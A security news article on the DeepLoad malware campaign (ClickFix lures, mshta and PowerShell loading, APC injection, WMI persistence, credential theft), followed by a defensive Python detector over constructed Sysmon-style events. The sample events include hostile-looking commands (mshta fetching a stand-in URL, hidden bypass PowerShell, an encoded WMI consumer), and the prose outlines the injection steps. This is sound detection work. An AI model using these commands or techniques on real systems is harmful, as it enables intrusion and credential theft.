A new malware campaign is using the ClickFix social-engineering technique to distribute a previously undocumented loader tracked as DeepLoad. According to ReliaQuest researchers Thassanai McCabe and Andrew Currie, the malware pairs obfuscation that appears to have been generated with AI tooling with process injection to slip past static defenses, and it begins stealing credentials as soon as it runs.
Malware Distribution via ClickFix Tactics
The attack begins with a ClickFix lure that tricks the user into running the attacker's command themselves: a fake error or verification prompt tells them to paste a string into the Windows Run dialog. That command invokes 'mshta.exe', a legitimate signed Windows binary, which is abused to download and execute an obfuscated PowerShell loader. Because the victim launches it, there is no malicious attachment for mail or web filters to catch; what a defender sees instead is explorer.exe spawning mshta.exe with a URL on its command line.
The loader hides its purpose behind junk variable assignments that never affect execution, a pattern the researchers believe was produced with AI tools to frustrate signature-based detection. DeepLoad is built to blend into normal Windows activity: it uses 'LockAppHost.exe', a legitimate Windows process, as the host for its payload.
Advanced Evasion Techniques
DeepLoad uses several techniques to stay undetected. It disables PowerShell command history and calls Windows API functions directly rather than going through cmdlets, sidestepping monitoring that keys on typical PowerShell activity. It also builds a second component at run time with PowerShell's Add-Type, compiling a temporary DLL under a randomized name. That step is not free for the attacker: in Windows PowerShell 5.1, Add-Type with inline source hands the compile to csc.exe and leaves the source, .cmdline and .dll files in the user's %TEMP% directory, so a powershell.exe to csc.exe process creation is a useful hunting pivot even when the script itself is unreadable.
Another stealth tactic is asynchronous procedure call (APC) injection, which lets the malware run inside a trusted Windows process without ever writing the decoded payload to disk. The loader starts the target process in a suspended state, writes shellcode into its memory, queues an APC pointing at that shellcode on the suspended thread, and resumes the thread so the APC runs. No CreateRemoteThread call is involved, so detections that rely on Sysmon Event ID 8 will not fire; the unusual parent-child pair (a PowerShell process spawning LockAppHost.exe) is the more reliable signal.
Credential Theft and Persistence
DeepLoad's primary goal is stealing browser-stored passwords. It also installs a malicious browser extension that intercepts credentials as they are typed into login pages and survives until someone removes it by hand. The malware also looks for removable media and copies itself onto it disguised as installers for popular software, giving it a way to spread to other machines.
Persistence is backed by a Windows Management Instrumentation (WMI) event subscription that can reinfect a cleaned system without any further action from the user or the attacker. Because the subscription lives in the WMI repository rather than in a Run key or a scheduled task, it falls outside many common persistence rules; the filter, consumer and binding can be enumerated in the root\subscription namespace, and Sysmon records their creation as Event IDs 19, 20 and 21.
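To make the chain concrete from the defender's side, the following is an added example (not code from ReliaQuest or from the DeepLoad operators) that runs the detections implied by the distribution, evasion and persistence sections above over constructed Sysmon-style events: mshta.exe fetching a URL under explorer.exe, powershell.exe spawned by mshta.exe, a csc.exe compile from PowerShell (Add-Type), LockAppHost.exe spawned by PowerShell, ScriptBlock text that disables history and declares DllImport, and a WMI filter/consumer/binding triple. The event layout, file paths, command lines, the PSReadLine-based history disable and the assumption that LockAppHost.exe is never a normal child of an interactive PowerShell session are illustrative assumptions, not details from the report.

```python
import re

# Constructed sample telemetry for this example; not real logs from the
# campaign. Field names are simplified from Sysmon Event ID 1 (ProcessCreate),
# 19/20/21 (WMI filter, consumer, binding) and PowerShell 4104 (ScriptBlock).
# Paths, PIDs and command lines are illustrative assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://verify.example.invalid/step"},
    {"id": 1, "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c <obfuscated>"},
    {"id": 4104, "pid": 4120,
     "script": "Set-PSReadLineOption -HistorySaveStyle SaveNothing\n"
               "Add-Type -TypeDefinition $src  # $src declares [DllImport(\"kernel32.dll\")]"},
    {"id": 1, "pid": 4130, "ppid": 4120,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\q3k8f2ab.cmdline"},
    {"id": 1, "pid": 4150, "ppid": 4120, "image": r"C:\Windows\System32\LockAppHost.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "LockAppHost.exe"},
    {"id": 19, "name": "DLFilter",
     "query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"id": 20, "name": "DLConsumer", "type": "Command Line",
     "destination": "powershell.exe -w hidden -e <base64>"},
    {"id": 21, "filter": "DLFilter", "consumer": "DLConsumer"},
    # Benign noise: an ordinary PowerShell child that should not alert.
    {"id": 1, "pid": 5000, "ppid": 3000, "image": r"C:\Windows\System32\whoami.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "whoami.exe"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32)\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path, so rules compare names only."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run the DeepLoad-chain rules over Sysmon-style events.

    Returns a list of (rule, detail) tuples. WMI bindings are resolved in a
    second pass because the binding (ID 21) may be logged before or after
    the consumer (ID 20) it references.
    """
    findings = []
    consumers = {}  # consumer name -> (type, command) from Event ID 20
    bindings = []   # Event ID 21 records, evaluated after the scan
    for e in events:
        if e["id"] == 1:
            img, par, cmd = basename(e["image"]), basename(e["parent"]), e["cmdline"]
            where = f"pid {e['pid']} ({par} -> {img}): {cmd}"
            # ClickFix/Run-dialog stage: mshta pulling remote content.
            if img == "mshta.exe" and re.search(r"https?://", cmd, re.I):
                findings.append(("mshta_remote_content", where))
            if img in POWERSHELL and par == "mshta.exe":
                findings.append(("powershell_from_mshta", where))
            # Add-Type with inline source: Windows PowerShell 5.1 shells out to csc.exe.
            if img == "csc.exe" and par in POWERSHELL:
                findings.append(("addtype_compile", where))
            # Injection target started by the loader (assumption: LockAppHost.exe
            # is not normally a child of an interactive PowerShell session).
            if img == "lockapphost.exe" and par in POWERSHELL:
                findings.append(("lockapphost_from_powershell", where))
        elif e["id"] == 4104:
            s = e["script"]
            if "HistorySaveStyle" in s and "SaveNothing" in s:
                findings.append(("history_disabled", f"pid {e['pid']}"))
            if "Add-Type" in s and "DllImport" in s:
                findings.append(("pinvoke_via_addtype", f"pid {e['pid']}"))
        elif e["id"] == 20:
            consumers[e["name"]] = (e["type"], e["destination"])
        elif e["id"] == 21:
            bindings.append(e)
    for b in bindings:
        ctype, dest = consumers.get(b["consumer"], ("", ""))
        if ctype == "Command Line" and SCRIPT_HOSTS.search(dest):
            findings.append(("wmi_subscription_persistence",
                             f"filter {b['filter']} -> consumer {b['consumer']}: {dest}"))
    return findings


def ancestry(events, pid):
    """Walk ProcessCreate events from pid upward; returns basenames, child first.

    When the chain leaves the log, the last event's recorded parent name is
    appended so the root (for Run-dialog launches, explorer.exe) still shows.
    """
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        e = by_pid[pid]
        chain.append(basename(e["image"]))
        if e["ppid"] not in by_pid:
            chain.append(basename(e["parent"]))
        pid = e["ppid"]
    return chain


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
    print("injection target lineage:", " <- ".join(ancestry(SAMPLE_EVENTS, 4150)))
```

Run as-is to see the findings and the reconstructed lineage; in production the rules would consume Sysmon Event IDs 1, 19, 20 and 21 and PowerShell 4104 from the SIEM rather than the embedded list. The WMI rule is kept separate from the process-tree rules on purpose: when a CommandLineEventConsumer fires, its command runs with WmiPrvSE.exe as the parent, which is exactly why hunts built around Run keys, scheduled tasks and the original mshta chain miss the reinfection.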
The DeepLoad disclosure coincides with a report from G DATA on a separate loader, Kiss Loader, which is delivered through phishing emails carrying Internet Shortcut (.url) files. How widely Kiss Loader has been deployed is still unclear; its developer claims to be based in Malawi.
As these threats keep evolving, the practical advice for organizations and individuals is specific: treat any web page or prompt that asks you to paste a command into the Run dialog as hostile, and hunt for the process chains, Add-Type compile artifacts and WMI event subscriptions described above rather than relying on static signatures alone.
